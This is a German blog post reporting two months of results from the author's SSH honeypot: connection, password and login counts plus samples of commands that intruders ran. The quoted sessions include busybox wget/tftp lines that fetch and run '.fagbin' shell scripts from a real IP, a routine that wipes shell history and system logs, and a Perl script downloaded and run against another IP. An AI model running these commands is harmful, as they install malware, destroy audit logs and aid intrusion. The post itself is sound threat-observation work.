Honeypot Project – Auswertung #2

Nun, nach knapp 2 Monaten an Laufzeit für meinen SSH-Honeypot, möchte ich nochmals kurz Bilanz ziehen und schauen, was so gegangen ist in letzter Zeit.

Aktuell hat mein Honeypot fast 40k Verbindungen erfasst von über Eintausend IPs:

Anzahl Verbindungen: 40’127
Anzahl Uniq-IP: 1’053

Da ich viele der bekanntesten Passwörter wie „root“, „toor“, „password“, etc. filtere waren auch nicht alle Logins erfolgreich:

Anzahl Passwörter: 66’893
Anzahl erfolgreiche Logins: 3’670

Doch all jene, welche durchgekommen sind, haben sich auch gleich umgesehen:

Anzahl CMD: 2’688

Die Grosszahl der Befehle, welche abgesetzt werden, dienen dem Nachladen von weiteren Scripten:

cd /var/ || cd /tmp/ || cd /var/run || cd /var/tmp/ || cd /dev/ || cd /mnt/
busybox wget http://64.95.100.88/.fagbin.sh || wget http://64.95.100.88/.fagbin.sh
busybox bash .fagbin.sh || sh .fagbin.sh
rm -rf .fagbin.sh
busybox tftp -r .fagbin2.sh -g 64.95.100.88 || tftp -r .fagbin2.sh -g 64.95.100.88
busybox bash .fagbin2.sh || sh .fagbin2.sh
busybox tftp 64.95.100.88 -c get .fagbin3.sh || tftp 64.95.100.88 -c get .fagbin3.sh
busybox bash .fagbin3.sh || sh .fagbin3.sh
rm -rf .fagbin2.sh .fagbin3.sh .fagbin.sh

Aber auch Testskripte für Speedtests sehe ich immer öfters. Hier soll der Server wohl als DDoS-Bot dienen. Nur sehr selten sieht man etwas komplexere Versuche:

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /var/log/wtmp
rm -rf /var/log/lastlog
rm -rf /var/log/secure
rm -rf /var/log/xferlog
rm -rf /var/log/messages
rm -rf /var/log/syslog
rm -rf /var/run/utmp
touch /var/run/utmp
touch /var/log/messages
touch /var/log/wtmp
touch /var/log/messages
touch /var/log/xferlog
touch /var/log/secure
touch /var/log/lastlog
rm -rf /var/log/maillog
touch /var/log/maillog
rm -rf /root/.bash_history
touch /root/.bash_history
history -r
rm -rf /var/spool/mail/root

cd /tmp
wget http://212.154.211.81/j.txt
curl -O http://212.154.211.81/j.txt
fetch http://212.154.211.81/j.txt
lwp-download http://212.154.211.81/j.txt
perl j.txt 113.30.102.54
rm -rf *.txt
uname
free -m
cat /proc/cpuinfo
cat /etc/issue

Wer das Projekt auch verfolgen möchte, der kann das hier machen.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.